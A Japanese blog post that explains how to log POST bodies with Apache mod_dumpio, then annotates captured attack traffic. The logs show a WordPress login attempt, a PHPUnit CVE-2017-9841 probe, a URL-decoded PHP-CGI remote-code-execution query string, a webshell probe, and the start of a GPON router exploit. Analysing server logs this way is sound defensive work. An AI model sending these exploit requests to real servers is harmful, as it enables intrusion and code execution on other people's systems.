[Apache] HTTP POSTのボディ部分をログに出力するには

Posted on by Tony3

ApacheでHTTP POSTのボディ部分をログに出力するにはApacheのdumpioというモジュールを有効化する。(公式ドキュメントでは、オーバーヘッドの観点からデバッグ時のみ有効化することを推奨している)
基本的にはこちらのサイトを参考にした。

dumpioモジュールを有効化して、Apacheのコンフィグ・ファイルのVirtualHostセクションに以下を追記。


# configuration to dump HTTP POST body to error.log
# ref: https://www.simplified.guide/apache/log-post
# ref: https://httpd.apache.org/docs/2.4/mod/mod_dumpio.html
DumpIOInput On
DumpIOOutput On
LogLevel dumpio:trace7

※ どのコンフィグ・ファイルに追記するかは環境による。自分は/etc/apache2/sites-enabled/配下のコンフィグ・ファイルに追記した。

編集が終わったらApacheを再起動する。これでPOSTのボディ部分がerror.logに出力されるようになる。

数日後にログを眺めてみた。

定番のWordPress管理画面へのログイン試行:

207.244.xxx.xxx - - [18/Nov/2020:16:18:49 +0000] "POST /wp-login.php HTTP/1.1" 200 2470 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"

[Wed Nov 18 16:18:49.182699 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): POST /wp-login.php HTTP/1.1\r\n
[Wed Nov 18 16:18:49.182706 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182710 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 21 bytes
[Wed Nov 18 16:18:49.182713 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Host: mymanfile.com\r\n
[Wed Nov 18 16:18:49.182716 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182719 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 90 bytes
[Wed Nov 18 16:18:49.182721 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\r\n
[Wed Nov 18 16:18:49.182726 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182729 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Wed Nov 18 16:18:49.182731 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 92\r\n
[Wed Nov 18 16:18:49.182734 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182737 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Wed Nov 18 16:18:49.182739 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Content-Type: application/x-www-form-urlencoded\r\n
[Wed Nov 18 16:18:49.182742 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182745 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 47 bytes
[Wed Nov 18 16:18:49.182748 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Cookie: wordpress_test_cookie=WP+Cookie+check\r\n
[Wed Nov 18 16:18:49.182750 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182753 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Wed Nov 18 16:18:49.182756 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Accept-Encoding: gzip\r\n
[Wed Nov 18 16:18:49.182758 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182761 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 19 bytes
[Wed Nov 18 16:18:49.182764 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Connection: close\r\n
[Wed Nov 18 16:18:49.182781 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182783 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Wed Nov 18 16:18:49.182786 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Wed Nov 18 16:18:49.182924 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [readbytes-blocking] 92 readbytes
[Wed Nov 18 16:18:49.182930 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 92 bytes
[Wed Nov 18 16:18:49.182933 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): log=hoge&pwd=blah&wp-submit=Log In&redirect_to=https://mymanfile.com/wp-admin/&testcookie=1
[Wed Nov 18 16:18:49.203079 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(164): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_out
[Wed Nov 18 16:18:49.203106 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_out (data-HEAP): 381 bytes
[Wed Nov 18 16:18:49.203111 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 200 OK\r\nDate: Wed, 18 Nov 2020 16:18:49 GMT\r\nServer: Apache\r\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nSet-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/\r\nX-Frame-Options: SAMEORIGIN\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 2089\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n

CVE-2017-9841の脆弱性の有無を確認するスキャン通信。PHPのmd5関数を実行しようとしている:


91.241.xxx.xxx - - [18/Nov/2020:19:11:10 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"


[Wed Nov 18 19:11:10.925471 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\n
[Wed Nov 18 19:11:10.925479 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925483 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 26 bytes
[Wed Nov 18 19:11:10.925486 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Host: 128.199.180.221:80\r\n
[Wed Nov 18 19:11:10.925490 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925493 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 129 bytes
[Wed Nov 18 19:11:10.925496 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n
[Wed Nov 18 19:11:10.925501 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925519 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Wed Nov 18 19:11:10.925521 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 19\r\n
[Wed Nov 18 19:11:10.925525 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925527 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Wed Nov 18 19:11:10.925530 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Content-Type: application/x-www-form-urlencoded\r\n
[Wed Nov 18 19:11:10.925533 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925536 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Wed Nov 18 19:11:10.925538 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Accept-Encoding: gzip\r\n
[Wed Nov 18 19:11:10.925541 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925544 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 19 bytes
[Wed Nov 18 19:11:10.925547 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Connection: close\r\n
[Wed Nov 18 19:11:10.925550 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925552 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Wed Nov 18 19:11:10.925555 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Wed Nov 18 19:11:10.925664 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [readbytes-blocking] 19 readbytes
[Wed Nov 18 19:11:10.925669 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 19 bytes
[Wed Nov 18 19:11:10.925672 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): <?=md5("phpunit")?>
[Wed Nov 18 19:11:10.925686 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(164): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_out
[Wed Nov 18 19:11:10.925689 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_out (data-HEAP): 164 bytes
[Wed Nov 18 19:11:10.925692 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 404 Not Found\r\nDate: Wed, 18 Nov 2020 19:11:10 GMT\r\nServer: Apache\r\nContent-Length: 196\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n

CGI版PHPに対するリモートコード実行の試行。PHPのdie関数及びmd5関数を実行しようとしている:


132.232.xxx.xxx - - [20/Nov/2020:01:41:20 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 396 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

URL decodes to

POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n


[Fri Nov 20 01:41:20.026271 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026275 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Fri Nov 20 01:41:20.026278 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Content-Type: application/x-www-form-urlencoded\r\n
[Fri Nov 20 01:41:20.026282 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026285 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 82 bytes
[Fri Nov 20 01:41:20.026288 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n
[Fri Nov 20 01:41:20.026292 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026295 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Fri Nov 20 01:41:20.026297 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Host: 128.199.180.221\r\n
[Fri Nov 20 01:41:20.026301 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026303 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Fri Nov 20 01:41:20.026306 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 28\r\n
[Fri Nov 20 01:41:20.026326 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026330 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 24 bytes
[Fri Nov 20 01:41:20.026332 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Connection: Keep-Alive\r\n
[Fri Nov 20 01:41:20.026335 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026338 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 25 bytes
[Fri Nov 20 01:41:20.026341 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Cache-Control: no-cache\r\n
[Fri Nov 20 01:41:20.026344 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026347 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Fri Nov 20 01:41:20.026349 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Fri Nov 20 01:41:20.026464 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [readbytes-blocking] 28 readbytes
[Fri Nov 20 01:41:20.026474 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 28 bytes
[Fri Nov 20 01:41:20.026479 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): <?php die(@md5(PHP-CGI)); ?>
[Fri Nov 20 01:41:20.026500 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(164): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_out
[Fri Nov 20 01:41:20.026505 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_out (data-HEAP): 200 bytes
[Fri Nov 20 01:41:20.026509 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 404 Not Found\r\nDate: Fri, 20 Nov 2020 01:41:20 GMT\r\nServer: Apache\r\nContent-Length: 196\r\nKeep-Alive: timeout=5, max=92\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n

Webshellの有無を確認するスキャン通信。Webshellを介してPHPのdie関数及びmd5関数を実行しようとしている:


132.232.xxx.xxx - - [20/Nov/2020:01:46:12 +0000] "POST /wuwu11.php HTTP/1.1" 404 396 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"


[Fri Nov 20 01:46:12.877094 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): OST /wuwu11.php HTTP/1.1\r\n
[Fri Nov 20 01:46:12.877107 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877113 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Fri Nov 20 01:46:12.877118 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Content-Type: application/x-www-form-urlencoded\r\n
[Fri Nov 20 01:46:12.877123 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877128 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 90 bytes
[Fri Nov 20 01:46:12.877132 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0\r\n
[Fri Nov 20 01:46:12.877138 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877143 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Fri Nov 20 01:46:12.877147 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Host: 128.199.180.221\r\n
[Fri Nov 20 01:46:12.877152 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877156 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Fri Nov 20 01:46:12.877160 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 23\r\n
[Fri Nov 20 01:46:12.877165 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877170 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 24 bytes
[Fri Nov 20 01:46:12.877174 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Connection: Keep-Alive\r\n
[Fri Nov 20 01:46:12.877179 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877183 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 25 bytes
[Fri Nov 20 01:46:12.877188 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Cache-Control: no-cache\r\n
[Fri Nov 20 01:46:12.877192 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877215 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Fri Nov 20 01:46:12.877219 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Fri Nov 20 01:46:12.877361 2020] [php7:error] [pid 21918] [client 132.232.xxx.xxx:45533] script '/var/www/html/wuwu11.php' not found or unable to stat
[Fri Nov 20 01:46:12.877379 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [readbytes-blocking] 23 readbytes
[Fri Nov 20 01:46:12.877385 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Fri Nov 20 01:46:12.877390 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): h=die(@md5(S3pt3mb3r));
[Fri Nov 20 01:46:12.877405 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(164): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_out
[Fri Nov 20 01:46:12.877409 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_out (data-HEAP): 200 bytes
[Fri Nov 20 01:46:12.877414 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 404 Not Found\r\nDate: Fri, 20 Nov 2020 01:46:12 GMT\r\nServer: Apache\r\nContent-Length: 196\r\nKeep-Alive: timeout=5, max=82\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n

GPONルータの脆弱性を突いてリモートコードを実行しようとしている通信。リモート・サーバよりMozi.mというファイルをダウンロードして/tmp/gpon80として保存しようとしている。Mozi.mは恐らくBot。


41.226.xxx.xxx - - [20/Nov/2020:05:07:22 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 397 "-" "Hello, World"


[Fri Nov 20 05:07:22.293850 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): POST /GponForm/diag_Form?images/ HTTP/1.1\r\n
[Fri Nov 20 05:07:22.293861 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293868 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Fri Nov 20 05:07:22.293872 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Host: 127.0.0.1:80\r\n
[Fri Nov 20 05:07:22.293877 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293883 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 24 bytes
